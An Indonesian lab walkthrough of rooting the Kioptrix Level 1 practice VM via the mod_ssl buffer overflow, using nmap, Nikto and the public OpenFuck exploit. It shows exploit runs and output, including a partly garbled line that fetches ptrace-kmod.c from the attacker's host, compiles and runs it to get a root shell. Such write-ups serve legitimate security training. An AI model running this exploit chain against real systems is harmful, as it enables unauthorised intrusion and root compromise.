Pembahasan Kioptrix Level 1 : SSL Exploit

Kioptrix Level 1 Mod SSL Exploit - Melanjutkan posting sebelum nya yang membahas cara exploit kiotrix di service samba Pembahasan Kioptrix Level 1 : Samba Exploit. untuk posting kali ini akan membahas bagaimana cara exploit kiotrix level 1 pada SSL nya sendiri yang mempunyai bug buffer overflow.

Tool Yang Dibutuhkan

1. Nmap
   
2. Metasploit 
   
3. Nikto
   
4. Kioptrix Level 1 : Download disini
   

Mencari Ip Target
Dalam mencari ip target, saya menggunakan nmap dengan parameter -sn untuk melakukan Ping scan agar dapat mencari host yg live

Quote:root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:06 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00042s latency).
MAC Address: 00:0C:29:83:B2:94 (VMware)
Nmap scan report for 192.168.33.254
Host is up (0.000044s latency).
MAC Address: 00:50:56:E2:65:F0 (VMware)
Nmap scan report for 192.168.33.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds

Scanning Service Pada Server
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter -sV untuk melakukan service version scanning

Quote:root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128

Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-26 13:38 HKT
Nmap scan report for 192.168.33.128
Host is up (0.00022s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:83:B2:94 (VMware)

Scanning Web Server For Vulnerabilities
Nikto adalah salah satu tool yang digunakan untuk melakukan scanning terhadap web server sehingga bisa mengetahui  'vulnerabilities' pada suatu server.

Quote:root@ubuntu-linux:/home/aiden# nikto -h 192.168.33.128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.33.128
+ Target Hostname:    192.168.33.128
+ Target Port:        80
+ Start Time:         2016-03-01 01:51:01 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 1146 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
........
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi...-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html. ......

Yup disitu tertera kalau mod_ssl nya bisa kita remote exploit sehingga bisa mendapatkan remote shell

Exploit yang saya gunakan adalah OpenFuckV2 yang bisa di temukan di Exploit-DB
[+] Tapi untuk diketahui bahwa exploit OpenFuck sendiri merupakan exploit yang lama, sehingga membutuhkan sedikit tambahan pada script nya, untk mengetahui tambahan nya kunjungi link berikut : paulsec.github.io

[+] Pada step 2 memperbaiki exploit openfuck menggunakan link dl.packetstormsecurity.net untuk mendownload exploit ptrace-kmod.c, karena saya tau bahwa Kiotrix Server pada Lab saya tidak terkoneksi ke internet, jadi saya pindahkan ptrace-kmod.c ke localhost ( mv ptrace-kmod.c var/www/html ) , karena di local network tidak membutuhkan jaringan internet untuk saling berkomunikasi, sehingga menjadi seperti digambar
lalu setelah itu saya compile OpenFuck setelah mengikuti step di paulsec.github.io selain step no. 2

Exploiting Kioptrix SSL

Setelah exploitnya udh dicompile, saat nya eksekusi

Quote:root@ubuntu-linux:/home/aiden/evil# ./OpenFuck | grep 1.3.20
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)
    0x27 - FreeBSD (apache-1.3.20)
    0x28 - FreeBSD (apache-1.3.20)
    0x29 - FreeBSD (apache-1.3.20+2.8.4)
    0x2a - FreeBSD (apache-1.3.20_1)
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7e - Slackware Linux 8.0 (apache-1.3.20)
    0x86 - SuSE Linux 7.3 (apache-1.3.20)

Terdapat 2 address yang bisa kita gunakan untuk exploit, kita coba satu satu dari kedua pilihan tersebut. Tapi gmn cara saya tau kalau OS yang digunakan Redhat dan apache versi 1.3.20 ? coba cek lagi hasil scanning nmap nya :D

Target Address 0x6a = GAGAL !

Quote:root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6a 192.168.33.128 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x81130e0
Ready to send shellcode
Spawning shell...
Good Bye!

Target Address 0x6b = SUKSES !

Quote:root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6b 192.168.33.128 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; tp://192.168.33.1/ptrace-kmod.c; gcc 
--13:45:33--  http://192.168.33.1/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.33.1:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

13:45:33 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 1340
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

[+] Awal nya target address 0x6b gagal seperti 0x6a tapi setelah saya eksekusi terus menurus sampai dgn 8 kali baru bisa mendapat remote shell seperti diatas, karena saya pikir kiotrix tersebut enggak saya perbaiki bug nya.

Goal dari kiotrix server adalah mendapatkan root shell, oleh karena itu pembahasan kali ini selesai sampai disini..

Akhir kata...

Semoga pembahasan ini dapat berguna bagi kita semua, dan saya mohon maaf apabila ada definisi yang salah.

---